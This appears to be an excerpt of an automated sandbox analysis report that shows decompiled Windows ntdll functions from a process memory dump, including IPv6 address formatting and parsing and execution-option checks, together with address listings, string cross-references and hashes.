                                                                                                                                                        0x01f98841
                                                                                                                                                        0x01f98844
                                                                                                                                                        0x01f98845
                                                                                                                                                        0x01f98848
                                                                                                                                                        0x01f9884d
                                                                                                                                                        0x01f98852
                                                                                                                                                        0x01f98b49
                                                                                                                                                        0x01f98858
                                                                                                                                                        0x01f9886c
                                                                                                                                                        0x01f9886c
                                                                                                                                                        0x01f98872
                                                                                                                                                        0x01fe1b0e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98878
                                                                                                                                                        0x01f98881
                                                                                                                                                        0x01f9888b
                                                                                                                                                        0x01f9888e
                                                                                                                                                        0x01f98891
                                                                                                                                                        0x01f98896
                                                                                                                                                        0x01f98899
                                                                                                                                                        0x01f98899
                                                                                                                                                        0x01f9889e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fe1b21
                                                                                                                                                        0x01fe1b27
                                                                                                                                                        0x01fe1b2e
                                                                                                                                                        0x01fe1b42
                                                                                                                                                        0x01fe1b44
                                                                                                                                                        0x01fe1b44
                                                                                                                                                        0x01fe1b4c
                                                                                                                                                        0x01fe1b4f
                                                                                                                                                        0x01fe1b55
                                                                                                                                                        0x01fe1b55
                                                                                                                                                        0x01f988a4
                                                                                                                                                        0x01f988aa
                                                                                                                                                        0x01f988b1
                                                                                                                                                        0x01f988c5
                                                                                                                                                        0x01fe1b5b
                                                                                                                                                        0x01fe1b5b
                                                                                                                                                        0x01f988c5
                                                                                                                                                        0x01f988ce
                                                                                                                                                        0x01f988e0
                                                                                                                                                        0x01f988e5
                                                                                                                                                        0x01f988e8
                                                                                                                                                        0x01f988e8
                                                                                                                                                        0x01f988ee
                                                                                                                                                        0x01f98900
                                                                                                                                                        0x01f98900
                                                                                                                                                        0x01f98905
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98905

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • WindowsExcludedProcs, xrefs: 01F987C1
                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 01F98914
                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 01F98827
                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 01F989FC
                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 01F987E6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcspbrk
                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                        • API String ID: 402402107-258546922
                                                                                                                                                        • Opcode ID: 36445a910fd79122daf1234caea9788ee5dab5b635d612bb288253d51e220cbc
                                                                                                                                                        • Instruction ID: 6b3011008a13f806903583d462606d5803723c1b1eecc26356ac1ac1fa70605c
                                                                                                                                                        • Opcode Fuzzy Hash: 36445a910fd79122daf1234caea9788ee5dab5b635d612bb288253d51e220cbc
                                                                                                                                                        • Instruction Fuzzy Hash: 3BF1E7B2D00209EFDF11EF99CD84DEEBBB8FF18244F14446AE605A7211E7369A45DB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01FB13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                        			E01FB13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E01FA7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1f72926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E01FA7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1f79cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E01FA7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E01FA7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E01FA7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E01FA7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                        0x01fb13d5
                                                                                                                                                        0x01fb13d9
                                                                                                                                                        0x01fb13dc
                                                                                                                                                        0x01fb13de
                                                                                                                                                        0x01fb13e1
                                                                                                                                                        0x01fb13e8
                                                                                                                                                        0x01fb13ee
                                                                                                                                                        0x01fde8fd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde921
                                                                                                                                                        0x01fde921
                                                                                                                                                        0x01fde928
                                                                                                                                                        0x01fde982
                                                                                                                                                        0x01fde98a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde99a
                                                                                                                                                        0x01fde99e
                                                                                                                                                        0x01fde9a3
                                                                                                                                                        0x01fde9a8
                                                                                                                                                        0x01fde9b9
                                                                                                                                                        0x01fde978
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde978
                                                                                                                                                        0x01fde98a
                                                                                                                                                        0x01fde92a
                                                                                                                                                        0x01fde931
                                                                                                                                                        0x01fde944
                                                                                                                                                        0x01fde944
                                                                                                                                                        0x01fde950
                                                                                                                                                        0x01fde954
                                                                                                                                                        0x01fde959
                                                                                                                                                        0x01fde95e
                                                                                                                                                        0x01fde963
                                                                                                                                                        0x01fde970
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde975
                                                                                                                                                        0x01fde93b
                                                                                                                                                        0x01fde980
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde980
                                                                                                                                                        0x01fde942
                                                                                                                                                        0x01fde94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde942
                                                                                                                                                        0x01fb13f4
                                                                                                                                                        0x01fb13f4
                                                                                                                                                        0x01fb13f9
                                                                                                                                                        0x01fb13fc
                                                                                                                                                        0x01fb13ff
                                                                                                                                                        0x01fb1406
                                                                                                                                                        0x01fde9cc
                                                                                                                                                        0x01fde9d2
                                                                                                                                                        0x01fde9d2
                                                                                                                                                        0x01fde9cc
                                                                                                                                                        0x01fb140c
                                                                                                                                                        0x01fb1411
                                                                                                                                                        0x01fb1431
                                                                                                                                                        0x01fb143a
                                                                                                                                                        0x01fb143c
                                                                                                                                                        0x01fb143f
                                                                                                                                                        0x01fb143f
                                                                                                                                                        0x01fb1442
                                                                                                                                                        0x01fb1447
                                                                                                                                                        0x01fb14a8
                                                                                                                                                        0x01fb14ac
                                                                                                                                                        0x01fde9e2
                                                                                                                                                        0x01fde9e7
                                                                                                                                                        0x01fde9ec
                                                                                                                                                        0x01fdea05
                                                                                                                                                        0x01fdea05
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb1449
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb1449
                                                                                                                                                        0x01fb144c
                                                                                                                                                        0x01fb1459
                                                                                                                                                        0x01fb1462
                                                                                                                                                        0x01fb1469
                                                                                                                                                        0x01fb146a
                                                                                                                                                        0x01fb1470
                                                                                                                                                        0x01fb1473
                                                                                                                                                        0x01fb1476
                                                                                                                                                        0x01fb1476
                                                                                                                                                        0x01fb1490
                                                                                                                                                        0x01fb1495
                                                                                                                                                        0x01fb138e
                                                                                                                                                        0x01fb1390
                                                                                                                                                        0x01fb1397
                                                                                                                                                        0x01fb1398
                                                                                                                                                        0x01fb1399
                                                                                                                                                        0x01fb13a1
                                                                                                                                                        0x01fb13a4
                                                                                                                                                        0x01fb13a4
                                                                                                                                                        0x01fb1498
                                                                                                                                                        0x01fb149c
                                                                                                                                                        0x01fb149f
                                                                                                                                                        0x01fb14a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb14a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb14a4
                                                                                                                                                        0x01fb1413
                                                                                                                                                        0x01fb1415
                                                                                                                                                        0x01fb1416
                                                                                                                                                        0x01fb1419
                                                                                                                                                        0x01fb141c
                                                                                                                                                        0x01fb1422
                                                                                                                                                        0x01fb13b7
                                                                                                                                                        0x01fb13bc
                                                                                                                                                        0x01fb13bf
                                                                                                                                                        0x01fb13bf
                                                                                                                                                        0x01fb13c2
                                                                                                                                                        0x01fb1424
                                                                                                                                                        0x01fb1424
                                                                                                                                                        0x01fb1424
                                                                                                                                                        0x01fb1427
                                                                                                                                                        0x01fb142b
                                                                                                                                                        0x01fb142c
                                                                                                                                                        0x01fb142c
                                                                                                                                                        0x01fb142c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb141c
                                                                                                                                                        0x01fb1411

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: 6fe006eee20a098f87056e25465380a5e665925468db0c82b608cb242f4191f3
                                                                                                                                                        • Instruction ID: 6e99f4016531e3197ac3f5201a1bb906c38dd8c00db239319ca448c35e9acf78
                                                                                                                                                        • Opcode Fuzzy Hash: 6fe006eee20a098f87056e25465380a5e665925468db0c82b608cb242f4191f3
                                                                                                                                                        • Instruction Fuzzy Hash: 1F6165B1D04606EACB24DF5ED8E08FFBBB6EF95300718C12EE5D647541E23AA640CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01FA7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E01FA7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2052088; // 0x777e1dd7
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01FA7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01FC3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01F7DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2054218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01FC3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01F80D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01FC3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01F88375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01FC3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01FEE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01FC3F92();
					_t38 = 1;
					L2:
					return E01F7E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                        0x01fa7f08
                                                                                                                                                        0x01fa7f0f
                                                                                                                                                        0x01fa7f12
                                                                                                                                                        0x01fa7f1b
                                                                                                                                                        0x01fa7f31
                                                                                                                                                        0x01fc3ead
                                                                                                                                                        0x01fc3eb4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc3eba
                                                                                                                                                        0x01fc3ecd
                                                                                                                                                        0x01fc3ed2
                                                                                                                                                        0x01fc3ee1
                                                                                                                                                        0x01fc3ee7
                                                                                                                                                        0x01fc3eec
                                                                                                                                                        0x01fc3f12
                                                                                                                                                        0x01fc3f18
                                                                                                                                                        0x01fc3f1a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc3f20
                                                                                                                                                        0x01fc3f26
                                                                                                                                                        0x01fc3f28
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc3f2e
                                                                                                                                                        0x01fc3f30
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc3f3a
                                                                                                                                                        0x01fc3f3b
                                                                                                                                                        0x01fc3f53
                                                                                                                                                        0x01fc3f64
                                                                                                                                                        0x01fc3f69
                                                                                                                                                        0x01fc3f6c
                                                                                                                                                        0x01fc3f6d
                                                                                                                                                        0x01fc3f6f
                                                                                                                                                        0x01fce304
                                                                                                                                                        0x01fce30f
                                                                                                                                                        0x01fce315
                                                                                                                                                        0x01fce31e
                                                                                                                                                        0x01fce321
                                                                                                                                                        0x01fce327
                                                                                                                                                        0x01fce329
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fce32f
                                                                                                                                                        0x01fce32f
                                                                                                                                                        0x01fce337
                                                                                                                                                        0x01fce33a
                                                                                                                                                        0x01fce33b
                                                                                                                                                        0x01fce33d
                                                                                                                                                        0x01fce33f
                                                                                                                                                        0x01fce341
                                                                                                                                                        0x01fce341
                                                                                                                                                        0x01fce34e
                                                                                                                                                        0x01fce353
                                                                                                                                                        0x01fce358
                                                                                                                                                        0x01fce35d
                                                                                                                                                        0x01fce35f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fce365
                                                                                                                                                        0x01fce365
                                                                                                                                                        0x01fce368
                                                                                                                                                        0x01fce36e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fce374
                                                                                                                                                        0x01fce32f
                                                                                                                                                        0x01fc3f75
                                                                                                                                                        0x01fc3f7a
                                                                                                                                                        0x01fc3f7c
                                                                                                                                                        0x01fc3f7e
                                                                                                                                                        0x01fc3f86
                                                                                                                                                        0x01fa7f39
                                                                                                                                                        0x01fa7f47
                                                                                                                                                        0x01fa7f47
                                                                                                                                                        0x01fa7f37
                                                                                                                                                        0x01fa7f37
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01FC3F12
                                                                                                                                                        Strings
                                                                                                                                                        • Execute=1, xrefs: 01FC3F5E
                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01FC3F75
                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01FCE345
                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01FC3EC4
                                                                                                                                                        • ExecuteOptions, xrefs: 01FC3F04
                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01FCE2FB
                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01FC3F4A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BaseDataModuleQuery
                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                        • API String ID: 3901378454-484625025
                                                                                                                                                        • Opcode ID: d32d481f2c503c823ccc9909e785011fc9a6fa196a47f418a9a8c2af08e5f395
                                                                                                                                                        • Instruction ID: 216b5e0af3a9c1fd1a7cc64b7ca217f58f0a1682eac8ad1220b56b6de61a58a6
                                                                                                                                                        • Opcode Fuzzy Hash: d32d481f2c503c823ccc9909e785011fc9a6fa196a47f418a9a8c2af08e5f395
                                                                                                                                                        • Instruction Fuzzy Hash: E641EB71A4031EBADB20EE94DCC5FDA77BCAF14700F4005AEA105E6081EB73DB468BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01FB0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E01FB0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E01F88980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01F7DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E01FB0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E01FB0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E01FB06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E01FB06BA(_t135, _t178) == 0 || E01FB0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E01FB0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E01FB0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E01FB06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E01FB06BA(_t124, _t142) == 0 || E01FB0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                        0x01fb0b21
                                                                                                                                                        0x01fb0b24
                                                                                                                                                        0x01fb0b27
                                                                                                                                                        0x01fb0b2a
                                                                                                                                                        0x01fb0b2d
                                                                                                                                                        0x01fb0b30
                                                                                                                                                        0x01fb0b33
                                                                                                                                                        0x01fb0b36
                                                                                                                                                        0x01fb0b39
                                                                                                                                                        0x01fb0b3e
                                                                                                                                                        0x01fb0c65
                                                                                                                                                        0x01fb0c68
                                                                                                                                                        0x01fb0c6a
                                                                                                                                                        0x01fb0c6f
                                                                                                                                                        0x01fdeb42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeb48
                                                                                                                                                        0x01fdeb48
